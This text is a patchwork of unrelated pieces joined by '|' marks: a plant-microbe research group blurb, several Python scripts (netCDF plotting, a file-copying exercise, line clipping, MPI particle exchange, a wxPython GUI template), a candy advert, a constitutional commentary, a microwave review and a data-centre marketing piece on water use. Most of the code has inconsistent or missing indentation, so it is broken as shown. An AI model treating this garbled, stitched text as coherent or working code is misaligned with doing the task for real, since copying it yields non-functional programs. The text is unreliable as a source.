The Plant Fungal Interactions Group (PFIG) is interested in the interactions of plants with non-conventional plant-associated microbes, both pathogens and health-promoting species; our major focus is on yeasts. We use a multidisciplinary approach that relies heavily on genetics and genomics. We also have a long-standing interest in ROS signaling, especially in the role of ROS and cell death in plant resistance to fungal pathogens.
|
#!/usr/bin/env python
from numpy import *
from matplotlib.pyplot import *
import sys
try:
    from netCDF4 import Dataset as NC
except ImportError:
    print "netCDF4 is not installed!"
    sys.exit(1)
nameroot = "routing"
for dx in ("100", "50", "25", "15", "10", "5"):
basename = nameroot + dx + "km"
filename = basename + ".nc"
print "%s: looking for file ..." % filename
try:
nc = NC(filename, 'r')
except:
print " can't read from file ..."
continue
xvar = nc.variables["x"]
yvar = nc.variables["y"]
x = asarray(squeeze(xvar[:]))
y = asarray(squeeze(yvar[:]))
for varname in ("bwat", "bwp", "psi"): # psi must go after bwat, bwp
print " %s: generating pcolor() image ..." % varname
try:
if varname == "psi":
var = nc.variables["topg"]
else:
var = nc.variables[varname]
except:
print "variable '%s' not found ... continuing ..." % varname
continue
data = asarray(squeeze(var[:])).transpose()
if varname == "bwat":
bwatdata = data.copy()
if varname == "bwp":
bwpdata = data.copy()
if varname == "psi":
# psi = bwp + rho_w g (topg + bwat)
data = bwpdata + 1000.0 * 9.81 * (data + bwatdata)
if varname == "bwat":
units = "m"
barmin = 0.0
barmax = 650.0
scale = 1.0
else:
units = "bar"
barmin = -20.0
barmax = 360.0
scale = 1.0e5
print " [stats: max = %9.3f %s, av = %8.3f %s]" % \
(data.max() / scale, units, data.sum() / (scale * x.size * y.size), units)
pcolor(x / 1000.0, y / 1000.0, data / scale, vmin=barmin, vmax=barmax)
colorbar()
gca().set_aspect('equal')
gca().autoscale(tight=True)
xlabel('x (km)')
ylabel('y (km)')
dxpad = "%03d" % int(dx)
pngfilename = varname + "_" + dxpad + "km" + ".png"
print " saving figure in %s ..." % pngfilename
savefig(pngfilename, dpi=300, bbox_inches='tight')
close()
nc.close()
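The expression `bwpdata + 1000.0 * 9.81 * (data + bwatdata)` above implements the commented formula psi = bwp + rho_w g (topg + bwat), with rho_w = 1000 kg/m^3 and g = 9.81 m/s^2. A quick stand-alone sanity check of that formula (all input values below are illustrative, not taken from any model output):

```python
# Stand-alone check of psi = bwp + rho_w * g * (topg + bwat).
# The inputs below are made-up illustrative values.
rho_w = 1000.0   # density of water (kg/m^3)
g = 9.81         # gravitational acceleration (m/s^2)
bwp = 1.0e5      # basal water pressure (Pa)
topg = 100.0     # bed elevation (m)
bwat = 2.0       # basal water layer thickness (m)
psi = bwp + rho_w * g * (topg + bwat)
print(psi)  # 1100620.0 Pa, i.e. about 11 bar
```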
|
Jolly Rancher Fruit Chews. The same great flavors as the hard candy, just in a chewy version. Each box of Jolly Rancher Fruit Chews comes in assorted flavors of Blue Raspberry, Cherry, Green Apple and Watermelon. If you enjoy the bold fruity taste of Jolly Ranchers, you will also enjoy these chewy treats.
We have all your favorite Jolly Rancher candy. Jolly Rancher sticks in apple and cherry, Jolly Rancher hard candy in a 5 pound bulk bag, or Jolly Rancher apple twists; whichever you prefer, we have them all.
Each box comes with 12 2.06 boxes of chewy fun.
|
#!/usr/bin/python
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import sys
import re
import os
import shutil
import commands
def get_special_path(dirr_name):
  paths = []
  files = os.listdir(dirr_name)
  for filee in files:
    special = re.search(r'__(\w+)__', filee)
    if special:
      # os.listdir() returns bare names; join with the directory before
      # resolving, so the result is correct regardless of the cwd.
      paths.append(os.path.abspath(os.path.join(dirr_name, filee)))
  print paths
  return paths
def copy_to(path,dirr):
print dirr
efile=get_special_path(path)
if not os.path.exists(dirr):
os.mkdir(dirr)
for each_file in efile:
shutil.copy(each_file,os.path.abspath(dirr))
def zip_to(path, zippath):
  efile = get_special_path(path)
  for each_file in efile:
    cmd = 'zip -j ' + zippath + ' ' + each_file
    (status, output) = commands.getstatusoutput(cmd)
    if status:  # non-zero exit status means the zip command failed
      sys.stderr.write(output)
      sys.exit(1)
def main():
# This basic command line argument parsing code is provided.
# Add code to call your functions below.
# Make a list of command line arguments, omitting the [0] element
# which is the script itself.
args = sys.argv[1:]
if not args:
    print "usage: [--todir dir][--tozip zipfile] dir [dir ...]"
sys.exit(1)
# todir and tozip are either set from command line
# or left as the empty string.
# The args array is left just containing the dirs.
todir = ''
if args[0] == '--todir':
todir = args[1]
del args[0:2]
tozip = ''
if args[0] == '--tozip':
tozip = args[1]
del args[0:2]
if len(args) == 0:
print "error: must specify one or more dirs"
sys.exit(1)
  # Call the functions with the parsed arguments.
  for dirr in args:
    if todir:
      copy_to(dirr, todir)
    elif tozip:
      zip_to(dirr, tozip)
    else:
      get_special_path(dirr)
if __name__ == "__main__":
main()
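As a quick, self-contained illustration of the "special" filename pattern the functions above rely on (a name is special if it contains a double-underscore-wrapped word, e.g. `__something__`; the filenames below are made up):

```python
import re

# A filename is "special" if it contains __something__ somewhere in it.
for name in ('xyz__hello__.txt', 'zz__something__.jpg', 'plain.txt'):
    print(name, bool(re.search(r'__(\w+)__', name)))
# xyz__hello__.txt True
# zz__something__.jpg True
# plain.txt False
```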
|
The provisions of this Constitution referring to the Governor-General in Council shall be construed as referring to the Governor-General acting with the advice of the Federal Executive Council.
▸ The Executive Council is to be abolished.
▸ The section is apt to mislead ordinary voters. It purports to draw a distinction between sections referring to the “Governor-General” and those which refer to the “Governor-General in Council”. This allows some to argue that powers given to the Governor-General which don’t refer to the Executive Council may be exercised without the Governor-General considering Ministers’ advice. Of course, the distinction is illusory, because to act “with the advice” of Ministers does not mean that the advice will be followed. Quick and Garran at p.707 describe the distinction as “historical and technical, rather than practical or substantial”. Crown powers which originated from common law were vested in the Governor-General if they were not controlled by statute at the time the Constitution was drafted. Other powers which originated from, or were controlled by, statute were vested in the Governor-General in Council. (See also Note 65A.4).
|
# -*- coding: utf-8 -*-
"""
UNIVERSIDADE DE FORTALEZA - UNIFOR
DEPARTAMENTO DE PÓS-GRADUAÇÃO EM INFORMÁTICA APLICADA - PPGIA
Course: Probability and Statistics
Exercise Solutions
----
Student: Jonas de Araújo Luz Jr. <jonasluzjr@edu.unifor.br>
"""
## LIBRARIES
#
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.lines as lines
from mpl_toolkits.axisartist.axislines import SubplotZero  # mpl_toolkits.axes_grid was removed in newer Matplotlib
def initplot(size):
    """
    Initializes the plotting of graphs.
    """
fig = plt.figure(1)
ax = SubplotZero(fig, 111)
fig.add_subplot(ax)
for direction in ["xzero", "yzero"]:
ax.axis[direction].set_axisline_style("-|>")
ax.axis[direction].set_visible(True)
for direction in ["left", "right", "bottom", "top"]:
ax.axis[direction].set_visible(False)
ax.set_xlim(-10, size)
ax.set_ylim(-10, size)
return (fig, ax)
def drawWindow(left, right, bottom, top):
    """
    Draws the viewing window.
    """
limR = right + 100
ix, iy = np.linspace(0, limR, limR - left), np.zeros(limR - left)
xw, xh = np.linspace(left, right, right-left+1), np.zeros(top-bottom+1)
yw, yh = np.zeros(right-left+1), np.linspace(bottom, top, top-bottom+1)
for mark in (bottom, top):
ax.plot(ix, iy + mark, linestyle=(0, (1, 5)), linewidth=1.0, color='black')
ax.plot(xw, yw + mark, linestyle=(0, ()), linewidth=1.5, color='black')
for mark in (left, right):
ax.plot(iy + mark, ix, linestyle=(0, (1, 5)), linewidth=1.0, color='black')
ax.plot(xh + mark, yh, linestyle=(0, ()), linewidth=1.5, color='black')
def drawLine(item, p1x, p1y, p2x, p2y, linewidth=1.0, color='blue'):
    """
    Draws the given line.
    """
    mx, my = p2x - p1x, p2y - p1y            # x and y deltas.
    pm = (p1x + mx/2, p1y + my/2)            # midpoint.
    m = my / mx if mx != 0 else float('inf') # slope of the line.
x, y = [], []
if m == float('inf'):
x = np.zeros(100) + p1x
y = np.linspace(p1y, p2y, 100)
else:
x = np.linspace(p1x, p2x, 100)
y = p1y + m * (x - p1x)
ax.plot(x, y, linewidth=linewidth, color=color)
if item:
ax.annotate(item,
xy=pm, xycoords='data',
xytext=(30, -15), textcoords='offset points',
arrowprops=dict(facecolor='black', shrink=0.05),
horizontalalignment='right', verticalalignment='middle')
INF = float('inf') # infinity.
BIT_L = 0B0001
BIT_R = 0B0010
BIT_B = 0B0100
BIT_T = 0B1000
def f(x, m, x1, y1):
    """
    Line equation solved for y.
    """
return y1 + m * (x - x1)
def fi(y, m, x1, y1):
    """
    Line equation solved for x.
    """
return ( x1 + (y - y1) / m ) if m != INF else x1
def csBinaryCode(left, right, bottom, top, x, y):
    """
    Cohen-Sutherland algorithm for two-dimensional clipping against a rectangular window.
    Subroutine to compute the binary region code of a given point.
    """
result = 0b0000
if x < left: result |= BIT_L
elif x > right: result |= BIT_R
if y < bottom: result |= BIT_B
elif y > top: result |= BIT_T
return result
def csIntersect(left, right, bottom, top, x, y, m, c, verbose=None):
    """
    Computes the valid intersection point starting from the point (x, y).
    """
p = (x, y)
if c:
        if c & BIT_L:                         # point to the left.
            p = (left, f(left, m, x, y))      # intersection with the left edge.
        elif c & BIT_R:                       # point to the right.
            p = (right, f(right, m, x, y))    # intersection with the right edge.
        c = csBinaryCode(left, right, bottom, top, *p)
        if verbose: print('{}\'={} - code: {:b}'.format(verbose, p, c))
        if c & BIT_B:                         # point below.
            p = (fi(bottom, m, x, y), bottom) # intersection with the bottom edge.
        elif c & BIT_T:                       # point above.
            p = (fi(top, m, x, y), top)       # intersection with the top edge.
        c = csBinaryCode(left, right, bottom, top, *p)
        if verbose: print('{}\'={} - code: {:b}'.format(verbose, p, c))
return (p, c)
def CohenSutherland(left, right, bottom, top, p1x, p1y, p2x, p2y, verbose=False):
    """
    Cohen-Sutherland algorithm for two-dimensional clipping against a rectangular window.
    """
p1, p2 = (p1x, p1y), (p2x, p2y)
c1 = csBinaryCode(left, right, bottom, top, *p1)
c2 = csBinaryCode(left, right, bottom, top, *p2)
    if verbose:
        print('CHECKING THE LINE SEGMENT {}-{} AGAINST THE WINDOW {}'.
              format(p1, p2, (left, right, bottom, top)))
        print('--------------------------------------------------------------------')
        print('The binary codes are: P1{}: {:b} and P2{}: {:b}.'.
              format(p1, c1, p2, c2))
result, m = None, None
    if c1 & c2: # trivial case: the segment is completely invisible.
        pass
    # otherwise, c1 & c2 == 0 - the segment is totally or partially visible.
    elif c1 | c2: # partially visible.
        mx, my = p2x - p1x, p2y - p1y   # x and y deltas.
        m = my / mx if mx != 0 else INF # slope of the line.
        ## Compute the intersections with the window edges.
        #
        p1, c1 = csIntersect(left, right, bottom, top, *p1, m, c1,
                             'P1' if verbose else None)
        p2, c2 = csIntersect(left, right, bottom, top, *p2, m, c2,
                             'P2' if verbose else None)
        result = (*p1, *p2)
    else: # totally visible.
        result = (*p1, *p2)
    if verbose:
        msg = 'TRIVIALLY AND COMPLETELY IN' if result == None else ('PARTIALLY ' if c1 | c2 else 'TOTALLY ')
        print('The line segment is {}VISIBLE'.format(msg))
        if result != None:
            print('The slope of the line is {}'.format(m))
            print('The segment {}-{} should be drawn'.
                  format((result[0], result[1]), (result[2], result[3])))
        print('====================================================================\n')
return result
def show():
plt.tight_layout()
plt.show()
fig, ax = initplot(1000)
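As a compact, self-contained illustration of the trivial-rejection test used by CohenSutherland above (the helper mirrors csBinaryCode; the window and points below are made-up values):

```python
# Region-code bits, as in the script above.
BIT_L, BIT_R, BIT_B, BIT_T = 0b0001, 0b0010, 0b0100, 0b1000

def outcode(left, right, bottom, top, x, y):
    """Region code of (x, y) relative to the clipping window (mirrors csBinaryCode)."""
    code = 0b0000
    if x < left:     code |= BIT_L
    elif x > right:  code |= BIT_R
    if y < bottom:   code |= BIT_B
    elif y > top:    code |= BIT_T
    return code

# Both endpoints lie to the left of and below the window (100, 300, 100, 300),
# so their codes share bits and the segment is trivially rejected.
c1 = outcode(100, 300, 100, 300, 50, 50)   # 0b0101
c2 = outcode(100, 300, 100, 300, 80, 20)   # 0b0101
print(c1 & c2 != 0)  # True -> trivially invisible
```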
|
Well built and easy to use. The black colour scheme may not suit all kitchens.
Finished in a stealth black exterior, the R372KM from Sharp provides a substantial 25 litre capacity, with 11 different power levels and 8 assorted auto cook and defrost settings.
The controls are very well labelled - you won't need to consult the manual in order to be up and running - no symbols are featured, and instead each button is clearly marked with easy to read text.
Build quality is pretty good - the various sections of the microwave feel like they are well constructed.
Overall dimensions are 30.6cm by 51.3cm by 42.9cm, and inside the microwave you'll find a generously sized 31.5cm turntable, which should accommodate the majority of large plates and dishes.
Our testers were impressed with the cooking performance of this microwave - with no cold spots or uncooked areas.
Essentially this is a well built, large solo microwave, which is both easy to use and performs well.
The Sharp R372KM offers pretty good value, and is very easy to operate. If you need a large solo microwave, then the R372KM is well worth considering.
|
# script with functions to use in main-file
# this script handle the "communication of particles between ranks"-part
import sys
# Simen Mikkelsen, 2016-11-21
# communication.py
'''
def exchange(X):
# Handle all the communication stuff here
# return the updated particle arrays
# (which may be of a different length now)
return X
'''
### TODO:
#implement 'find biggest factor'-function or another dynamical function to determine number of cells in each direction
import numpy as np
import mpi4py.MPI as MPI
### TODO: import comm from main?
#comm = MPI.COMM_WORLD
#rank_communication_module = communicator.Get_rank() # not used, parameter given from main
#mpi_size_communication_module = communicator.Get_size() # not used, parameter given from main
## INITIALISING start
# number of cells in each direction (only divide x-direction initially)
cell_x_n = 20
cell_y_n = 0
cell_n = cell_x_n + cell_y_n
# scaling factor used when expanding/shrinking the local arrays
scaling_factor = 1.25 ## variable
shrink_if = 1/(scaling_factor**3)
# the particles are defined with its properties in several arrays
# one tag for each properties which are communicated to other ranks
# tags: id, x-pos, y-pos
# other properties: active-status
tag_n = 3
# buffer overhead to use in memory reservation for non-blocking communication
buffer_overhead = 1000
## INITIALISING end
# spatial properties
x_start = 0
x_end = 1
y_start = 0
y_end = 1
x_len = x_end - x_start
y_len = y_end - y_start
## VARIABLES start
## VARIABLES end
## secondary FUNCTIONS start
# function to find the corresponding rank of a cell
# this function determines how the cells are distributed to ranks
### TODO: discussion: how to do this distribution
def find_rank_from_cell(cell_id, mpi_size):
return int(cell_id % mpi_size)
# function to find the corresponding cell of a position
# this function determines how the cells are distributed geometrically
### TODO: discussion: how to do this distribution
def find_cell_from_position(x, y):
return int(((x - x_start)/(x_len))*(cell_x_n)) # for 1D
# send_n_array: array to show how many particles should be sent from one rank to the others
# filled out locally in each rank, then communicated to all other ranks
# rows represent particles sent FROM rank = row number (0 indexing)
# column represent particles sent TO rank = row number (0 indexing)
# function to fill out the array showing how many particles need to be sent from a given rank, given the local particles there
# local particles are the particles who belonged to the rank before the transport of particles.
# some of the particles may have to been moved to a new rank if they have been moved to a cell belonging to a new rank
# send_to: array to show which rank a local particle needs to be sent to. or -1 if it should stay in the same rank
def global_communication_array(mpi_size, rank, particle_n, particle_x, particle_y, particle_active):
#print('global com.array, particle n:', particle_n)
# reset arrays telling which particles are to be sent
send_to = np.zeros(particle_n, dtype=int) # local
send_to[:] = -1
send_n_array = np.zeros((mpi_size, mpi_size), dtype=int)
for i in range(particle_n):
# only check if the particle is active
if particle_active[i]:
# find the rank of the cell of which the particle (its position) belongs to
particle_rank = find_rank_from_cell(find_cell_from_position(particle_x[i], particle_y[i]), mpi_size)
# if the particle's new rank does not equal the current rank (for the given process), it should be moved
if particle_rank != rank:
send_n_array[int(rank)][int(particle_rank)] = send_n_array[int(rank)][int(particle_rank)] + 1
send_to[i] = particle_rank
# converted indices to int to not get 'deprecation warning'
return send_to, send_n_array
# function to reallocate active particles to the front of the local arrays
# active_n = number of active particles after deactivation of particles sent to another rank, but before receiving.
# aka. particles that stays in its own rank
def move_active_to_front(particle_id, particle_x, particle_y, particle_active, active_n):
#print('move_active_to_front(), particle_active, active_n:', particle_active.dtype, active_n)
particle_id[:active_n] = particle_id[particle_active]
particle_x[:active_n] = particle_x[particle_active]
particle_y[:active_n] = particle_y[particle_active]
# set the corresponding first particles to active, the rest to false
particle_active[:active_n] = True
particle_active[active_n:] = False
return particle_id, particle_x, particle_y, particle_active
## secondary FUNCTIONS end
## main FUNCTION start
# all variables taken in by exchange() are local variables for the given rank (except mpi_size)
def exchange(communicator,
mpi_size,
rank,
#particle_n, # could also be calculated in function: particle_n = np.size(particle_id)
particle_id,
particle_x,
particle_y,
particle_active):
#print('mpi_size from main module', mpi_size)
#print('mpi_size from communication module', mpi_size_communication_module)
#print('rank from main module', rank)
#print('rank from communication module', rank_communication_module)
# compute "global communication array"
# with all-to-all communication
# length of local particle arrays
particle_n = np.size(particle_id)
# note: not necessary equal to number of active particles
send_to, send_n = global_communication_array(mpi_size, rank, particle_n, particle_x, particle_y, particle_active)
# all nodes receives results with a collective 'Allreduce'
# mpi4py requires that we pass numpy objects (byte-like objects)
send_n_global = np.zeros((mpi_size, mpi_size), dtype=int)
communicator.Allreduce(send_n, send_n_global , op=MPI.SUM)
# each rank communicate with other ranks if it sends or receives particles from that rank
# this information is now given in the "global communication array"
# point-to-point communication of particles
# using list of arrays for communication of particle properties
# initializing "communication arrays": send_*** and recv_***
# send_**: list of arrays to hold particles that are to be sent from a given rank to other ranks,
# where the row number corresponds to the rank the particles are sent to
# recv_**: list of arrays to hold particles that are to be received from to a given rank from other ranks,
# where row number corresponds to the rank the particles are sent from
send_id = []
send_x = []
send_y = []
recv_id = []
recv_x = []
recv_y = []
# total number of received particles
received_n = np.sum(send_n_global, axis = 0)[rank]
for irank in range(mpi_size):
# find number of particles to be received from irank (sent to current rank)
Nrecv = send_n_global[irank, rank]
# append recv_id with the corresponding number of elements
recv_id.append(np.zeros(Nrecv, dtype = np.int64))
recv_x.append(np.zeros(Nrecv, dtype = np.float64))
recv_y.append(np.zeros(Nrecv, dtype = np.float64))
# find number of particles to be sent to irank (from current rank)
Nsend = send_n_global[rank, irank]
# append send_id with the corresponding number of elements
send_id.append(np.zeros(Nsend, dtype = np.int64))
send_x.append(np.zeros(Nsend, dtype = np.float64))
send_y.append(np.zeros(Nsend, dtype = np.float64))
# counter to get position in send_** for a particle to be sent
send_count = np.zeros(mpi_size, dtype=int)
# iterate over all local particles to allocate them to send_** if they belong in another rank
for i in range(particle_n):
# if particle is active (still a local particle) and should be sent to a rank (-1 means that the particle already is in the correct rank)
if (particle_active[i] and send_to[i] != -1):
# fill the temporary communication arrays (send_**) with particle and it's properties
send_id[send_to[i]][send_count[send_to[i]]] = i
send_x[send_to[i]][send_count[send_to[i]]] = particle_x[i]
send_y[send_to[i]][send_count[send_to[i]]] = particle_y[i]
# deactivate sent particle
particle_active[i] = False
# increment counter to update position in temporary communication arrays (send_**)
send_count[send_to[i]] = send_count[send_to[i]] + 1
# actual exchange of particle properties follows
# must convert the list of arrays which are to be communicated to numpy objects (byte-like objects)
# this is not done before because np.ndarrays does not support a "list of arrays" if the arrays does not have equal dimensions
#send_id_np = np.array(send_id)
#recv_id_np = np.array(recv_id)
#send_x_np = np.array(send_x)
#recv_x_np = np.array(recv_x)
#send_y_np = np.array(send_y)
#recv_y_np = np.array(recv_y)
# requests to be used for non-blocking send and receives
send_request_id = [0] * mpi_size
send_request_x = [0] * mpi_size
send_request_y = [0] * mpi_size
recv_request_id = [0] * mpi_size
recv_request_x = [0] * mpi_size
recv_request_y = [0] * mpi_size
# sending
for irank in range(mpi_size):
if (irank != rank):
# number of particles rank sends to irank
Nsend = send_n_global[rank, irank]
            # only send if there is something to send
if (Nsend > 0):
#print('rank:', rank, 'sending', Nsend, 'particles to', irank)
# use tags to separate communication of different arrays/properties
# tag uses 1-indexing so there will be no confusion with the default tag = 0
send_request_id[irank] = communicator.isend(send_id[irank][0:Nsend], dest = irank, tag = 1)
send_request_x[irank] = communicator.isend(send_x[irank][0:Nsend], dest = irank, tag = 2)
send_request_y[irank] = communicator.isend(send_y[irank][0:Nsend], dest = irank, tag = 3)
# receiving
for irank in range(mpi_size):
if (irank != rank):
            # number of particles irank sends to rank (number of particles rank receives from irank)
            Nrecv = send_n_global[irank, rank]
            # only receive if there is something to receive
if (Nrecv > 0):
#print('rank:', rank, 'receiving', Nrecv, 'particles from', irank)
buf_id = np.zeros(Nrecv+buffer_overhead, dtype = np.int64)
buf_x = np.zeros(Nrecv+buffer_overhead, dtype = np.float64)
buf_y = np.zeros(Nrecv+buffer_overhead, dtype = np.float64)
# use tags to separate communication of different arrays/properties
# tag uses 1-indexing so there will be no confusion with the default tag = 0
recv_request_id[irank] = communicator.irecv(buf = buf_id, source = irank, tag = 1)
recv_request_x[irank] = communicator.irecv(buf = buf_x, source = irank, tag = 2)
recv_request_y[irank] = communicator.irecv(buf = buf_y, source = irank, tag = 3)
# obtain data from completed requests
# only at this step is the data actually returned.
for irank in range(mpi_size):
if irank != rank:
# if there is something to receive
if send_n_global[irank, rank] > 0: # Nrecv > 0
recv_id[irank][:] = recv_request_id[irank].wait()
recv_x[irank][:] = recv_request_x[irank].wait()
recv_y[irank][:] = recv_request_y[irank].wait()
#print('recv_id_np:', recv_id_np)
#print("recv_x_np:", recv_x_np)
#print("recv_y_np:", recv_y_np)
# make sure this rank does not exit until sends have completed
for irank in range(mpi_size):
if irank != rank:
# if there is something to send
if send_n_global[rank, irank] > 0: # Nsend > 0
send_request_id[irank].wait()
send_request_x[irank].wait()
send_request_y[irank].wait()
# total number of received and sent particles
# total number of active particles after communication
sent_n = int(np.sum(send_n_global, axis = 1)[rank])
received_n = int(np.sum(send_n_global, axis = 0)[rank])
active_n = int(np.sum(particle_active))
# move all active particles to front of local arrays
if (active_n > 0):
particle_id, particle_x, particle_y, particle_active = move_active_to_front(particle_id, particle_x, particle_y, particle_active, active_n)
# resize local arrays if needed
# current scaling factor = 1.25
### TODO: add ceil/floor directly in if-check?
# check if local arrays have enough free space, if not, allocate a 'scaling_factor' more than needed
if (active_n + received_n > particle_n):
new_length = int(np.ceil((active_n + received_n)*scaling_factor))
# if new length is not equal old length: resize all local arrays
if new_length != particle_n:
#print('extending arrays to new length:', new_length)
# with .resize-method, missing/extra/new entries are filled with zero (false in particle_active)
### TODO: change from resize function to method
particle_active = np.resize(particle_active, new_length)
particle_id = np.resize(particle_id, new_length)
particle_x = np.resize(particle_x, new_length)
particle_y = np.resize(particle_y, new_length)
# particle_active.resize(new_length, refcheck = False)# refcheck = True by default
# particle_id.resize(new_length, refcheck = False)
# particle_x.resize(new_length, refcheck = False)
# particle_y.resize(new_length, refcheck = False)
# check if local arrays are bigger than needed (with a factor: shrink_if = 1/scaling_factor**3)
# old + new particles < shrink_if*old_size
# if they are, shrink them with a scaling_factor
if (active_n + received_n < shrink_if*particle_n):
new_length = int(np.ceil(particle_n/scaling_factor))
# if new length is not equal old length: resize all local arrays
if new_length != particle_n:
#print('shrinking arrays to new length:', new_length)
### TODO: change from resize function to method
particle_active = np.resize(particle_active, new_length)
particle_id = np.resize(particle_id, new_length)
particle_x = np.resize(particle_x, new_length)
particle_y = np.resize(particle_y, new_length)
# particle_active.resize(new_length, refcheck = false)# refcheck = true by default
# particle_id.resize(new_length, refcheck = false)
# particle_x.resize(new_length, refcheck = false)
# particle_y.resize(new_length, refcheck = False)
# add the received particles to local arrays
# unpack (hstack) the list of arrays, (ravel/flatten can not be used for dtype=object)
if received_n > 0:
particle_id[active_n:active_n+received_n] = np.hstack(recv_id)
particle_x[active_n:active_n+received_n] = np.hstack(recv_x)
particle_y[active_n:active_n+received_n] = np.hstack(recv_y)
# set the received particles to active
        particle_active[active_n:active_n+received_n] = np.ones(received_n, dtype=bool)  # np.bool is deprecated
# optional printing for debugging
# print values for debugging
#print('particle_n (old value):', particle_n)
#print("old active_n:", active_n)
#print("sent_n:", sent_n)
#print("received_n:", received_n)
#print("new active_n:", np.sum(particle_active))
#print('new length of local arrays:', np.size(particle_id))
#print("new local particles:", particle_id)
#print("new active particles:", particle_active*1) # *1 to turn the output into 0 and 1 instead of False and True
else:
print("\nno received particles")
# print global array
if rank == 0:
print('\nglobal_array:\n', send_n_global)
# return the updated particle arrays
    return (particle_id,
            np.array([ particle_x,   # x component
                       particle_y]), # y component
            particle_active)
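The Allreduce step above can be illustrated without MPI: each rank fills only its own row of the communication array, and the element-wise sum of the per-rank arrays (which is what `Allreduce(..., op=MPI.SUM)` leaves on every rank) yields the global send matrix. A toy sketch with three hypothetical ranks and made-up counts:

```python
import numpy as np

# Each rank fills only its own row locally; entry [r][c] counts the
# particles rank r sends to rank c.  The values below are made up.
local_rank0 = np.array([[0, 2, 1], [0, 0, 0], [0, 0, 0]])
local_rank1 = np.array([[0, 0, 0], [3, 0, 0], [0, 0, 0]])
local_rank2 = np.array([[0, 0, 0], [0, 0, 0], [1, 4, 0]])

# Element-wise sum: the result Allreduce with op=MPI.SUM gives every rank.
send_n_global = local_rank0 + local_rank1 + local_rank2

# Column sums give how many particles each rank receives;
# row sums give how many particles each rank sends.
print(send_n_global.sum(axis=0))  # [4 6 1]
print(send_n_global.sum(axis=1))  # [3 3 5]
```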
|
Facility managers across all data centers are concerned about power usage. But there is another significant resource widely consumed by data centers across the world that is more precious than power.
We are talking about the usage of water, a resource that a data center simply needs in huge quantities. The alarming state of its usage is forcing companies to come up with innovative ways to measure water consumption and efficiency. The biggest example is that of Facebook, which showed off its new concept of Water Usage Effectiveness (WUE) for its data center in Prineville, Oregon.
The new metric introduced by Facebook was one of a kind and showed that efficiency of a data center should be measured in more ways than just one (i.e. the power consumption).
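For readers unfamiliar with the metric: WUE is typically computed as annual site water usage divided by IT equipment energy, in litres per kilowatt-hour. A minimal sketch with made-up figures:

```python
# WUE = annual site water usage (litres) / IT equipment energy (kWh).
# The figures below are illustrative only, not from any real facility.
annual_water_litres = 120000.0
annual_it_energy_kwh = 100000.0
wue = annual_water_litres / annual_it_energy_kwh
print(wue)  # 1.2 litres per kWh -- lower is better
```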
Similarly, the concept of using water from industrial canals as done in Google's data center in Belgium is another attempt at conserving water. Microsoft also made the cut with recycled water usage in its data centers in San Antonio, TX.
Though both these methods require the recycled water to be treated periodically, it definitely saves on water consumption.
Several measures, like increasing the humidity levels in the data center, raising the air temperature, sealing up the data center etc., have all been experimented with and are additional ways of reducing water consumption in data centers.
The rise of electronic data usage will only pave the way for more water usage, as more and more data center facilities will be required to handle the volume. Studies say there has been an increase of over 150 percent in internet usage in the US alone compared to the previous decade.
Data center facilities for the NSA in Utah have reportedly consumed an average of 1.7 million gallons of water per day for its operation that includes cooling and heat dissipation.
So an effective water conservation plan should be adopted in data center facilities to ensure fair usage of this natural resource, which is more precious than electricity. Striking a balance with resource consumption in your data center facility could prove to be a Herculean task.
This is where outsourcing your data center needs to an expert data center service provider like us can give your business an advantage. At Lifeline Data Centers, we are committed to providing our customers with the greenest and most balanced data center solutions for their business needs. Visit our website to learn more about our co-location services.
Alex, co-owner, is responsible for all real estate, construction and mission critical facilities: hardened buildings, power systems, cooling systems, fire suppression, and environmentals. Alex also manages relationships with the telecommunications providers and has an extensive background in IT infrastructure support, database administration and software design and development. Alex architected Lifeline’s proprietary GRCA system and is hands-on every day in the data center.
|
#********************************************************************************
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#********************************************************************************
#
# Created by Brian Keene on 8 September 2016
#
# Revision history:
#
#
#********************************************************************************
# note - on OSX, requires framework build of python/2.7 to run, as this
# application requires access to the screen (this might only apply to systems
# running Mavericks or later)
# This script is intended to serve as a template for graphical user interfaces;
# it is primarily meant to be a simplified front-end to wxWidgets, and to allow
# for easy setup of dynamic hiding that might involve cross-communication between
# objects of assorted placement in the hierarchy of parent-child objects. Allows
# for an OOP creation of a GUI, with emphasis on easy modification in the
# accompanying script.
# import the needed modules
import wx, os
# global dictionary in which we store data
myDict = {}
class wxFrame(wx.Frame):
# note to others: we pass another class (an instance of Frame) to this wx.Frame derived class;
# the ambiguity of parent in the class __init__ vs the wx.Frame.__init__ is due to parent in the
# wx.Frame.__init__ function being a /keyword/ argument, rather than a python convention, as is used
# in the class __init__ function. The wx.Frame.__init__ parent argument /must/ be a wx.Window object,
# or simply value "None", which is what we usually use
# __init__ takes the implicit self argument as usual
# and 'sibling' here is an instance of our 'Frame' class defined immediately below this class.
# 'sibling' holds all the necessary data needed to define a wx.Frame object.
def __init__(self,sibling):
wx.Frame.__init__(self,parent=sibling._parent,title=sibling._title)
self.SetInitialSize(sibling._size)
# we define our own Frame() class, because we don't instantly want to create an actual wx.Frame object yet
class Frame:
# a static class object we can access using Frame._register[index] - we don't access this via an instance of
# the class; we can also iterate over it, looking for instances with specific data
_register = []
_typeName = "Frame"
# implicit argument self
# parent: typically None, but if a frame is spawned dynamically it may be useful to pass the relevant object
# title: string displayed at the top of the frame (the name)
# size: integer tuple (e.g., (100,100)) specifying the size of the frame in pixels
def __init__(self, parent, title, size, **kwargs):
self._parent = parent;
self._title = title;
self._size = size;
# an instance variable holding other instances that are children of this instance
self._children = []
def initObj(self):
# make an instance of the frame, that is a derived class of the wx.Frame class
self._obj = wxFrame(self)
Frame._register.append(self)
# iterate over this instance's children and initialize them.
for obj in self._children:
obj.initObj();
# we have now instantiated all of the objects on this frame; show the frame
self._obj.Show()
# a wxNotebook class
class wxNotebook(wx.Notebook):
# the implicit self argument, as usual
# and 'sibling' - the instance of 'Notebook' class (defined below) holding all
# necessary data needed to define the wx.Notebook
def __init__(self,sibling):
wx.Notebook.__init__(self, sibling._parent._obj)
